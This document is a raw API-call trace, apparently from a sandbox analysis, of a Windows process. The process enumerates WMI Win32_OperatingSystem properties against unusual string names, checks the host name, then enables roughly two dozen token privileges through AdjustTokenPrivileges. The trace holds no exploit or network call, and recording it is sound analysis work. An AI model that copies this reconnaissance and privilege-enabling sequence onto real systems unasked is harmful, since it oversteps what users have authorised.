[0044.394] IWbemClassObject:Get (in: This=0x2242c20, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="ServicePackMinorVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SizeStoredInPagingFiles", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="SizeStoredInPagingFiles", cchCount2=23) returned 1
[0044.395] lstrlenW (lpString="SizeStoredInPagingFiles") returned 23
[0044.395] lstrlenW (lpString="lgiet286a") returned 9
[0044.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="SizeStoredInPagingFiles", cchCount2=23) returned 1
[0044.395] lstrlenW (lpString="SizeStoredInPagingFiles") returned 23
[0044.395] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="SizeStoredInPagingFiles", cchCount2=23) returned 3
[0044.395] lstrlenW (lpString="SizeStoredInPagingFiles") returned 23
[0044.395] lstrlenW (lpString="numberofusers") returned 13
[0044.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="SizeStoredInPagingFiles", cchCount2=23) returned 1
[0044.395] IUnknown:Release (This=0x2242c20) returned 0x1
[0044.395] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.395] IWbemClassObject:Get (in: This=0x2242db8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.395] IWbemClassObject:Get (in: This=0x2242db8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SizeStoredInPagingFiles", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Status", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Status", cchCount2=6) returned 1
[0044.395] lstrlenW (lpString="Status") returned 6
[0044.395] lstrlenW (lpString="lgiet286a") returned 9
[0044.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Status", cchCount2=6) returned 1
[0044.395] lstrlenW (lpString="Status") returned 6
[0044.395] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Status", cchCount2=6) returned 3
[0044.395] lstrlenW (lpString="Status") returned 6
[0044.395] lstrlenW (lpString="numberofusers") returned 13
[0044.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Status", cchCount2=6) returned 1
[0044.395] IUnknown:Release (This=0x2242db8) returned 0x1
[0044.395] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.395] IWbemClassObject:Get (in: This=0x2242f50, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDevice", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.396] IWbemClassObject:Get (in: This=0x2242f50, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Status", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SystemDevice", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="SystemDevice", cchCount2=12) returned 1
[0044.396] lstrlenW (lpString="SystemDevice") returned 12
[0044.396] lstrlenW (lpString="lgiet286a") returned 9
[0044.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="SystemDevice", cchCount2=12) returned 1
[0044.396] lstrlenW (lpString="SystemDevice") returned 12
[0044.396] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="SystemDevice", cchCount2=12) returned 3
[0044.396] lstrlenW (lpString="SystemDevice") returned 12
[0044.396] lstrlenW (lpString="numberofusers") returned 13
[0044.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="SystemDevice", cchCount2=12) returned 1
[0044.396] IUnknown:Release (This=0x2242f50) returned 0x1
[0044.396] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.396] IWbemClassObject:Get (in: This=0x22430e8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDevice", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDirectory", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.396] IWbemClassObject:Get (in: This=0x22430e8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SystemDevice", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SystemDirectory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="SystemDirectory", cchCount2=15) returned 1
[0044.396] lstrlenW (lpString="SystemDirectory") returned 15
[0044.396] lstrlenW (lpString="lgiet286a") returned 9
[0044.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="SystemDirectory", cchCount2=15) returned 1
[0044.396] lstrlenW (lpString="SystemDirectory") returned 15
[0044.396] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="SystemDirectory", cchCount2=15) returned 3
[0044.396] lstrlenW (lpString="SystemDirectory") returned 15
[0044.396] lstrlenW (lpString="numberofusers") returned 13
[0044.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="SystemDirectory", cchCount2=15) returned 1
[0044.396] IUnknown:Release (This=0x22430e8) returned 0x1
[0044.396] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.397] IWbemClassObject:Get (in: This=0x2243280, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDirectory", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDrive", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.397] IWbemClassObject:Get (in: This=0x2243280, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SystemDirectory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SystemDrive", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="SystemDrive", cchCount2=11) returned 1
[0044.397] lstrlenW (lpString="SystemDrive") returned 11
[0044.397] lstrlenW (lpString="lgiet286a") returned 9
[0044.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="SystemDrive", cchCount2=11) returned 1
[0044.397] lstrlenW (lpString="SystemDrive") returned 11
[0044.397] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="SystemDrive", cchCount2=11) returned 3
[0044.397] lstrlenW (lpString="SystemDrive") returned 11
[0044.397] lstrlenW (lpString="numberofusers") returned 13
[0044.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="SystemDrive", cchCount2=11) returned 1
[0044.397] IUnknown:Release (This=0x2243280) returned 0x1
[0044.397] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.397] IWbemClassObject:Get (in: This=0x2243418, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDrive", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="TotalSwapSpaceSize", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.397] IWbemClassObject:Get (in: This=0x2243418, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SystemDrive", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="TotalSwapSpaceSize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="TotalSwapSpaceSize", cchCount2=18) returned 1
[0044.397] lstrlenW (lpString="TotalSwapSpaceSize") returned 18
[0044.397] lstrlenW (lpString="lgiet286a") returned 9
[0044.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="TotalSwapSpaceSize", cchCount2=18) returned 1
[0044.397] lstrlenW (lpString="TotalSwapSpaceSize") returned 18
[0044.397] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="TotalSwapSpaceSize", cchCount2=18) returned 3
[0044.397] lstrlenW (lpString="TotalSwapSpaceSize") returned 18
[0044.397] lstrlenW (lpString="numberofusers") returned 13
[0044.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="TotalSwapSpaceSize", cchCount2=18) returned 1
[0044.398] IUnknown:Release (This=0x2243418) returned 0x1
[0044.398] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.398] IWbemClassObject:Get (in: This=0x22435b0, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="TotalSwapSpaceSize", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="TotalVirtualMemorySize", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.398] IWbemClassObject:Get (in: This=0x22435b0, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="TotalSwapSpaceSize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="TotalVirtualMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="TotalVirtualMemorySize", cchCount2=22) returned 1
[0044.398] lstrlenW (lpString="TotalVirtualMemorySize") returned 22
[0044.398] lstrlenW (lpString="lgiet286a") returned 9
[0044.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="TotalVirtualMemorySize", cchCount2=22) returned 1
[0044.398] lstrlenW (lpString="TotalVirtualMemorySize") returned 22
[0044.398] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="TotalVirtualMemorySize", cchCount2=22) returned 3
[0044.398] lstrlenW (lpString="TotalVirtualMemorySize") returned 22
[0044.398] lstrlenW (lpString="numberofusers") returned 13
[0044.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="TotalVirtualMemorySize", cchCount2=22) returned 1
[0044.398] IUnknown:Release (This=0x22435b0) returned 0x1
[0044.398] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.398] IWbemClassObject:Get (in: This=0x2243748, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="TotalVirtualMemorySize", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="TotalVisibleMemorySize", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.398] IWbemClassObject:Get (in: This=0x2243748, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="TotalVirtualMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="TotalVisibleMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="TotalVisibleMemorySize", cchCount2=22) returned 1
[0044.398] lstrlenW (lpString="TotalVisibleMemorySize") returned 22
[0044.398] lstrlenW (lpString="lgiet286a") returned 9
[0044.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="TotalVisibleMemorySize", cchCount2=22) returned 1
[0044.398] lstrlenW (lpString="TotalVisibleMemorySize") returned 22
[0044.398] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="TotalVisibleMemorySize", cchCount2=22) returned 3
[0044.398] lstrlenW (lpString="TotalVisibleMemorySize") returned 22
[0044.398] lstrlenW (lpString="numberofusers") returned 13
[0044.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="TotalVisibleMemorySize", cchCount2=22) returned 1
[0044.399] IUnknown:Release (This=0x2243748) returned 0x1
[0044.399] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.399] IWbemClassObject:Get (in: This=0x2248fc8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="TotalVisibleMemorySize", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Version", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.399] IWbemClassObject:Get (in: This=0x2248fc8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="TotalVisibleMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Version", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Version", cchCount2=7) returned 1
[0044.399] lstrlenW (lpString="Version") returned 7
[0044.399] lstrlenW (lpString="lgiet286a") returned 9
[0044.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Version", cchCount2=7) returned 1
[0044.399] lstrlenW (lpString="Version") returned 7
[0044.399] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Version", cchCount2=7) returned 1
[0044.399] lstrlenW (lpString="Version") returned 7
[0044.399] lstrlenW (lpString="numberofusers") returned 13
[0044.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Version", cchCount2=7) returned 1
[0044.399] IUnknown:Release (This=0x2248fc8) returned 0x1
[0044.399] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.399] IWbemClassObject:Get (in: This=0x2249160, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Version", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsDirectory", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.399] IWbemClassObject:Get (in: This=0x2249160, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Version", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="WindowsDirectory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="WindowsDirectory", cchCount2=16) returned 1
[0044.399] lstrlenW (lpString="WindowsDirectory") returned 16
[0044.399] lstrlenW (lpString="lgiet286a") returned 9
[0044.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="WindowsDirectory", cchCount2=16) returned 1
[0044.399] lstrlenW (lpString="WindowsDirectory") returned 16
[0044.399] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="WindowsDirectory", cchCount2=16) returned 1
[0044.399] lstrlenW (lpString="WindowsDirectory") returned 16
[0044.399] lstrlenW (lpString="numberofusers") returned 13
[0044.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="WindowsDirectory", cchCount2=16) returned 1
[0044.399] IUnknown:Release (This=0x2249160) returned 0x1
[0044.400] IUnknown:Release (This=0x66c600) returned 0x1
[0044.400] IUnknown:Release (This=0x65c508) returned 0x0
[0044.400] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="Kqncmv426", cchCount2=9) returned 3
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="lgiet286a", cchCount2=9) returned 3
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="UUFIKrncm", cchCount2=9) returned 1
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="numberofusers", cchCount2=13) returned 2
[0044.400] wcstok (in: _String="Select * from Win32_OperatingSystem", _Delimiter=" ", _Context=0x6e2e9fbe | out: _String="Select", _Context=0x6e2e9fbe) returned="Select"
[0044.400] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6e2e9fbe | out: _String=0x0, _Context=0x6e2e9fbe) returned="*"
[0044.400] lstrlenW (lpString="FROM") returned 4
[0044.400] lstrlenW (lpString="*") returned 1
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0044.400] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6e2e9fbe | out: _String=0x0, _Context=0x6e2e9fbe) returned="from"
[0044.400] lstrlenW (lpString="FROM") returned 4
[0044.400] lstrlenW (lpString="from") returned 4
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0044.400] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6e2e9fbe | out: _String=0x0, _Context=0x6e2e9fbe) returned="Win32_OperatingSystem"
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0044.400] lstrlenW (lpString="CREATE") returned 6
[0044.400] lstrlenW (lpString="get") returned 3
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="CREATE", cchCount2=6) returned 3
[0044.400] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0044.400] ??0CHString@@QAE@XZ () returned 0x12fb90
[0044.406] ?Format@CHString@@QAAXPBGZZ () returned 0x18f964
[0044.406] ??1CHString@@QAE@XZ () returned 0x1
[0044.406] WbemLocator:IUnknown:AddRef (This=0x630828) returned 0x3
[0044.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="", cchCount2=0) returned 3
[0044.406] lstrlenW (lpString="CRH2YWU7") returned 8
[0044.406] GetCurrentProcess () returned 0xffffffff
[0044.406] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x12fad0 | out: TokenHandle=0x12fad0*=0x280) returned 1
[0044.406] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12facc | out: TokenInformation=0x0, ReturnLength=0x12facc) returned 0
[0044.406] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x18f958, TokenInformationLength=0x118, ReturnLength=0x12facc | out: TokenInformation=0x18f958, ReturnLength=0x12facc) returned 1
[0044.406] AdjustTokenPrivileges (in: TokenHandle=0x280, DisableAllPrivileges=0, NewState=0x18f958*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0044.406] CloseHandle (hObject=0x280) returned 1
[0044.406] lstrlenW (lpString="GET") returned 3
[0044.406] lstrlenW (lpString="get") returned 3
[0044.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0044.406] lstrlenA (lpString="") returned 0
[0044.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8926a2, cbMultiByte=-1, lpWideCharStr=0x17d2f28, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0044.406] lstrlenA (lpString="") returned 0
[0044.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8926a2, cbMultiByte=-1, lpWideCharStr=0x17d2f28, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0044.406] lstrlenA (lpString="") returned 0
[0044.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8926a2, cbMultiByte=-1, lpWideCharStr=0x17d2f28, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0044.407] lstrlenA (lpString="") returned 0
[0044.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8926a2, cbMultiByte=-1, lpWideCharStr=0x17d2f28, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__CLASS", cchCount2=7) returned 3
[0044.407] lstrlenW (lpString="__DERIVATION") returned 12
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__DERIVATION", cchCount2=12) returned 3
[0044.407] lstrlenW (lpString="__DYNASTY") returned 9
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__DYNASTY", cchCount2=9) returned 3
[0044.407] lstrlenW (lpString="__GENUS") returned 7
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__GENUS", cchCount2=7) returned 3
[0044.407] lstrlenW (lpString="__NAMESPACE") returned 11
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__NAMESPACE", cchCount2=11) returned 3
[0044.407] lstrlenW (lpString="__PATH") returned 6
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__PATH", cchCount2=6) returned 3
[0044.407] lstrlenW (lpString="__PROPERTYCOUNT") returned 15
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
